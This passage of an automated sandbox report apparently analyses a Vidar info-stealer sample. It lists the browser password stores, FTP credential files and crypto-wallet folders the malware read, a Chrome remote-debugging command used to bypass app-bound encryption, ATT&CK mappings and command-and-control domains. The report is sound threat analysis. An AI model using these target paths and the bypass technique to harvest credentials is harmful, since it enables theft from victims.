                Source: Miniature.com, 00000010.00000002.2123806267.00000000015CC000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: *exodus*.*
                Source: Miniature.com, 00000010.00000002.2123806267.00000000015CC000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: *ethereum*.*
                Source: Miniature.com, 00000010.00000002.2122589934.000000000024D000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets\
                Source: Miniature.com, 00000010.00000002.2122589934.000000000024D000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                Source: Miniature.com, 00000010.00000002.2122589934.000000000024D000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: MultiDoge
                Source: Miniature.com, 00000010.00000002.2122589934.000000000024D000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: seed.seco
                Source: Miniature.com, 00000010.00000002.2122589934.000000000024D000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: keystore
                Source: Miniature.com, 00000010.00000002.2122589934.000000000024D000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Electrum-LTC\wallets\
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\minidumps\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\temporary\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\crashes\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\default\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\to-be-removed\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\tmp\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\db\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionstore-backups\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\crashes\events\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\events\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\bookmarkbackups\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\y572q81e.default\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\security_state\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.dbJump to behavior
                Tries to harvest and steal ftp login credentials
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                Tries to steal Crypto Currency Wallets
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                Source: Miniature.comBinary or memory string: WIN_81
                Source: Miniature.comBinary or memory string: WIN_XP
                Source: Releases.0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                Source: Miniature.comBinary or memory string: WIN_XPe
                Source: Miniature.comBinary or memory string: WIN_VISTA
                Source: Miniature.comBinary or memory string: WIN_7
                Source: Miniature.comBinary or memory string: WIN_8
                Source: Yara matchFile source: 00000010.00000002.2122589934.000000000024D000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Miniature.com PID: 7416, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Attempt to bypass Chrome Application-Bound Encryption
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Yara detected Vidar stealer
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: 16.2.Miniature.com.170000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000010.00000003.1461652856.0000000004428000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.2125465557.0000000001BD6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000003.1461452990.0000000001C0B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000003.1461172169.000000000443F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000003.1461338592.0000000004AA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.2126191611.00000000043A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000003.1461229379.0000000001BE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000003.1461592581.0000000001C8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.2122589934.0000000000171000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Miniature.com PID: 7416, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C92263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,16_2_00C92263
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C91C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,16_2_00C91C61

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		1
                Windows Management Instrumentation                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		2
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts1
                Native API                		2
                Valid Accounts                		1
                DLL Side-Loading                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol4
                Data from Local System                		11
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                Extra Window Memory Injection                		2
                Obfuscated Files or Information                		Security Account Manager3
                File and Directory Discovery                		SMB/Windows Admin Shares21
                Input Capture                		1
                Remote Access Software                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts                		1
                DLL Side-Loading                		NTDS27
                System Information Discovery                		Distributed Component Object Model3
                Clipboard Data                		3
                Non-Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation                		1
                Extra Window Memory Injection                		LSA Secrets11
                Query Registry                		SSHKeylogging14
                Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts12
                Process Injection                		111
                Masquerading                		Cached Domain Credentials221
                Security Software Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Valid Accounts                		DCSync11
                Virtualization/Sandbox Evasion                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                Virtualization/Sandbox Evasion                		Proc Filesystem4
                Process Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                Access Token Manipulation                		/etc/passwd and /etc/shadow1
                Application Window Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron12
                Process Injection                		Network Sniffing1
                System Owner/User Discovery                		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1578042 Sample: pM3fQBuTLy.exe Startdate: 19/12/2024 Architecture: WINDOWS Score: 100 56 hulkpara.xyz 2->56 58 t.me 2->58 60 cvCCAtzStAgfHNw.cvCCAtzStAgfHNw 2->60 80 Suricata IDS alerts for network traffic 2->80 82 Found malware configuration 2->82 84 Antivirus detection for URL or domain 2->84 88 6 other signatures 2->88 10 pM3fQBuTLy.exe 26 2->10         started        12 msedge.exe 2->12         started        signatures3 86 Performs DNS queries to domains with low reputation 56->86 process4 process5 14 cmd.exe 3 10->14         started        18 msedge.exe 12->18         started        21 msedge.exe 12->21         started        23 msedge.exe 12->23         started        25 msedge.exe 12->25         started        dnsIp6 54 C:\Users\user\AppData\Local\...\Miniature.com, PE32 14->54 dropped 100 Drops PE files with a suspicious file extension 14->100 27 Miniature.com 29 14->27         started        31 cmd.exe 2 14->31         started        33 conhost.exe 14->33         started        35 7 other processes 14->35 62 20.110.205.119, 443, 49805, 49843 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 18->62 64 204.79.197.219, 443, 49846, 49847 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 18->64 66 20 other IPs or domains 18->66 file7 signatures8 process9 dnsIp10 72 hulkpara.xyz 94.130.191.168, 443, 49711, 49712 HETZNER-ASDE Germany 27->72 74 t.me 149.154.167.99, 443, 49710 TELEGRAMRU United Kingdom 27->74 76 127.0.0.1 unknown unknown 27->76 92 Attempt to bypass Chrome Application-Bound Encryption 27->92 94 Found many strings related to Crypto-Wallets (likely being stolen) 27->94 96 Found API chain indicative of sandbox detection 27->96 98 4 other signatures 27->98 37 msedge.exe 2 11 27->37         started        40 chrome.exe 27->40         started        43 cmd.exe 27->43         started        signatures11 process12 dnsIp13 90 Monitors registry run keys for changes 37->90 45 msedge.exe 37->45         started        68 192.168.2.7, 123, 138, 443 unknown unknown 40->68 70 239.255.255.250 unknown Reserved 40->70 47 chrome.exe 40->47         started        50 conhost.exe 43->50         started        52 timeout.exe 43->52         started        signatures14 process15 dnsIp16 78 www.google.com 172.217.19.228, 443, 49722, 49723 GOOGLEUS United States 47->78

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                pM3fQBuTLy.exe11%ReversingLabsWin32.Trojan.Sonbokli
                pM3fQBuTLy.exe10%VirustotalBrowse

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Temp\325114\Miniature.com0%ReversingLabs

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://hulkpara.xyz/100%Avira URL Cloudmalware
                https://t.m0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                chrome.cloudflare-dns.com
                		162.159.61.3
                		truefalse
                  		high
                  t.me
                  		149.154.167.99
                  		truefalse
                    		high
                    ssl.bingadsedgeextension-prod-europe.azurewebsites.net
                    		94.245.104.56
                    		truefalse
                      		high
                      sb.scorecardresearch.com
                      		18.165.220.66
                      		truefalse
                        		high
                        www.google.com
                        		172.217.19.228
                        		truefalse
                          		high
                          hulkpara.xyz
                          		94.130.191.168
                          		truetrue
                            		unknown
                            s-part-0035.t-0009.t-msedge.net
                            		13.107.246.63
                            		truefalse
                              		high
                              googlehosted.l.googleusercontent.com
                              		172.217.17.65
                              		truefalse
                                		high
                                clients2.googleusercontent.com
                                		unknown
                                		unknownfalse
                                  		high
                                  bzib.nelreports.net
                                  		unknown
                                  		unknownfalse
                                    		high
                                    assets.msn.com
                                    		unknown
                                    		unknownfalse
                                      		high
                                      cvCCAtzStAgfHNw.cvCCAtzStAgfHNw
                                      		unknown
                                      		unknownfalse
                                        		unknown
                                        ntp.msn.com
                                        		unknown
                                        		unknownfalse
                                          		high

                                          Contacted URLs

                                          NameMaliciousAntivirus DetectionReputation
                                          https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734597976003&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                            		high
                                            https://c.msn.com/c.gif?rnd=1734597969347&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=c87c0c2827f044b19e1956450ca6519b&activityId=c87c0c2827f044b19e1956450ca6519b&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0false
                                              		high
                                              https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734597974994&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                                		high
                                                https://hulkpara.xyz/true
                                                • Avira URL Cloud: malware
                                                		unknown
                                                https://sb.scorecardresearch.com/b?rn=1734597969348&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=08F1B41B03E76B2C0A73A14102FE6A7B&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*nullfalse
                                                  		high
                                                  https://assets.msn.com/statics/icons/favicon_newtabpage.pngfalse
                                                    		high
                                                    https://c.msn.com/c.gif?rnd=1734597969347&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=c87c0c2827f044b19e1956450ca6519b&activityId=c87c0c2827f044b19e1956450ca6519b&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=267493DD80724C64AC29441BD36923AF&MUID=08F1B41B03E76B2C0A73A14102FE6A7Bfalse
                                                      		high

                                                      URLs from Memory and Binaries

                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                      https://duckduckgo.com/chrome_newtabMiniature.com, 00000010.00000002.2126606877.000000000463D000.00000004.00000800.00020000.00000000.sdmp, Miniature.com, 00000010.00000002.2127699132.00000000046F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726956412.0000010400C7C000.00000004.00000800.00020000.00000000.sdmp, XTJEKX.16.dr, Web Data.26.dr, 5FCJE3.16.drfalse
                                                        		high
                                                        https://mail.google.com/mail/?usp=installed_webappchrome.exe, 00000015.00000002.1722649690.00000104000EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://duckduckgo.com/ac/?q=chrome.exe, 00000015.00000002.1724301271.000001040061C000.00000004.00000800.00020000.00000000.sdmp, XTJEKX.16.dr, Web Data.26.dr, 5FCJE3.16.drfalse
                                                            		high
                                                            https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditingchrome.exe, 00000015.00000002.1722493733.0000010400077000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://permanently-removed.invalid/oauth2/v2/tokeninfomsedge.exe, 00000018.00000003.1786300199.000071EC00264000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1786855374.000071EC0026C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://ntp.msn.com/0000003.log7.26.drfalse
                                                                  		high
                                                                  https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=bchrome.exe, 00000015.00000002.1726390613.0000010400A80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://docs.google.com/document/Jchrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
